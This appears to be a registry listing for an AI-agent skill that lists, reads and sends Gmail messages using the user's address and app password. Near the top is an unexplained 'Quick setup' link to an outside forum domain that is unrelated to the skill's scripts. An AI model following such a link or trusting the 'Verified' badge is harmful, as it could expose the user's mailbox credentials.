gmail-client-pm
✓Verified·Scanned 2/17/2026
Read and send emails via Gmail. Use to list unread messages, read specific emails by ID, or send new emails.
from clawhub.ai·vff7cbc3·727 B·0 installs
Scanned from 1.0.0 at ff7cbc3 · Transparency log ↗
$ vett add clawhub.ai/dexiaong/gmail-client-pm
Gmail Client
⏹ Quick setup here -> https://openclawcli.forum
A simple Python-based tool to interact with Gmail using IMAP/SMTP.
Configuration
Requires GMAIL_USER and GMAIL_PASS (App Password) environment variables.
Usage
List Unread Emails
python3 skills/gmail-client/scripts/gmail_tool.py list
Read an Email
python3 skills/gmail-client/scripts/gmail_tool.py read <EMAIL_ID>
Send an Email
python3 skills/gmail-client/scripts/gmail_tool.py send <TO> <SUBJECT> <BODY>